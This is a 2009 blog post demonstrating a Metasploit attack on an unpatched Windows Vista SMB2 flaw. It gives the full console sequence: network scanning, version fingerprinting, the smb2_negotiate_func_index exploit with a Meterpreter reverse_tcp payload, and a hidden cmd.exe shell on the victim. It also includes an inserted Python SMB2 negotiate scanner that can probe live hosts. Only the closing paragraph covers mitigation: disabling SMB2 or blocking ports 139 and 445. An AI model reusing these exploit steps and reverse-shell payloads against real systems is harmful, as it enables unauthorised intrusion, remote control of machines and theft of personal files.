Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I downloaded Metasploit Framework 3.3 and tested the new, still unpatched SMB2 exploit on my local network ;-D.

Run the metasploit framework console
$ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/
msf auxiliary(smb2) > set RHOSTS
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] supports SMB 2 [dialect 255.2] and has been online for 8 hours
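To show what the smb2 scanner module is actually doing in the output above, here is the exchange behind it written out in Python. This is an added example of mine, not code from the original post or from Metasploit: it builds the single SMB1 NEGOTIATE request that advertises the "SMB 2.002" dialect, and if the server replies with an SMB2 header (\xfeSMB) it reads the DialectRevision and the SystemTime/ServerStartTime fields, which is where the "dialect 2.2" and "has been online for N hours" lines come from. The sample replies are constructed, not captured from a real host; probe() is the live version and needs a reachable SMB server.

```python
import socket
import struct

# Added example (not from the original post or from Metasploit): the
# negotiate exchange that auxiliary/scanner/smb/smb2 relies on.
FILETIME_TICKS_PER_HOUR = 3600 * 10_000_000   # FILETIME is in 100 ns units

# 32-byte SMB1 header for SMB_COM_NEGOTIATE (0x72).
SMB1_HEADER = struct.pack(
    "<4sBIBHH8sHHHHH",
    b"\xffSMB",   # ProtocolId
    0x72,         # Command: SMB_COM_NEGOTIATE
    0,            # Status
    0x18,         # Flags: canonical paths, case-insensitive
    0xC853,       # Flags2: unicode, NT status codes, extended security, long names
    0,            # PidHigh (left at 0; a plain probe does not touch this field)
    b"\x00" * 8,  # SecurityFeatures
    0, 0, 0, 0, 0 # Reserved, TreeId, PidLow, UserId, MultiplexId
)


def build_negotiate_request(dialects=(b"NT LM 0.12", b"SMB 2.002")):
    """SMB1 NEGOTIATE listing the given dialects, wrapped in a NetBIOS
    session-service header (type 0 plus a 3-byte big-endian length).
    Offering "SMB 2.002" is what makes an SMB2-capable server answer in SMB2."""
    blob = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = SMB1_HEADER + struct.pack("<BH", 0, len(blob)) + blob  # WordCount, ByteCount
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def parse_negotiate_response(packet):
    """Return None when the server answers in SMB1 (no SMB2 support),
    otherwise a dict with the dialect printed the way the scanner prints
    it (low byte, dot, high byte: 0x0202 -> "2.2", 0x02FF -> "255.2")
    and the uptime in whole hours derived from the two timestamps."""
    if len(packet) < 4 or packet[0] != 0:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(packet[1:4], "big")
    msg = packet[4:4 + length]
    if len(msg) != length:
        raise ValueError("truncated message")
    if msg[:4] == b"\xffSMB":
        return None
    if msg[:4] != b"\xfeSMB" or len(msg) < 64 + 56:
        raise ValueError("unrecognised reply")
    command = struct.unpack_from("<H", msg, 12)[0]   # Command sits at header offset 12
    if command != 0:                                 # 0 = SMB2 NEGOTIATE
        raise ValueError("unexpected SMB2 command %d" % command)
    # NEGOTIATE response body follows the 64-byte SMB2 header.
    (_size, security_mode, dialect, _ctx, _guid, _caps, _mt, _mr, _mw,
     system_time, start_time) = struct.unpack_from("<HHHH16sIIIIQQ", msg, 64)
    return {
        "dialect": "%d.%d" % (dialect & 0xFF, dialect >> 8),
        "signing_required": bool(security_mode & 0x02),
        "uptime_hours": (system_time - start_time) // FILETIME_TICKS_PER_HOUR,
    }


def make_sample_smb2_reply(dialect, uptime_hours):
    """Constructed SMB2 NEGOTIATE response for offline use (not a real capture)."""
    start_time = 128_991_852_000_000_000          # an arbitrary FILETIME in October 2009
    system_time = start_time + uptime_hours * FILETIME_TICKS_PER_HOUR
    header = struct.pack("<4sHHIHHIIQIIQ16s",
                         b"\xfeSMB", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, 1, dialect, 0, b"\x11" * 16, 0, 65536, 65536, 65536,
                       system_time, start_time, 128, 0, 0)
    msg = header + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def make_sample_smb1_reply():
    """Constructed minimal SMB1 reply: what a host without SMB2 sends back."""
    msg = b"\xffSMB" + bytes(28)
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-reply")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5.0):
    """Live exchange against one host; needs network access, so not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        nb = _recv_exact(s, 4)
        body = _recv_exact(s, int.from_bytes(nb[1:4], "big"))
    return parse_negotiate_response(nb + body)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        for d, h in ((0x0202, 21), (0x02FF, 10)):
            print(parse_negotiate_response(make_sample_smb2_reply(d, h)))
        print(parse_negotiate_response(make_sample_smb1_reply()))
```

Run it with a hostname or IP to probe a live target, or with no arguments to see the constructed samples parsed; a host that answers with SMB1 yields None, which is why such hosts simply do not appear in the scanner's listing.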

Quite a result! Now check the Windows version of the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS
msf auxiliary(version) > run

[*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit against that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened ( ->

Succeeded! Now I’ve got access to the computer. That gives me full control of the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.


It is quite a dangerous situation: people can get into your computer without you knowing about it, and worse, once in they can take your personal files and folders or spy on you.

If you’re connected to a public wired or wireless network (Starbucks, Old Town, or a lab), the recommended workaround for the time being is to disable SMB2. Microsoft has released a "Fix it" that does this; you can get it here. It sets the Smb2 value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters to 0 and restarts the Server service, so the host falls back to SMB1; Microsoft's advisory also lists blocking TCP ports 139 and 445 at the firewall as an alternative. Either way, rerun the smb2 scanner afterwards: a host that no longer reports SMB 2 support is no longer exposed to this exploit.

Don’t be ignorant of this, or you’ll be in trouble.
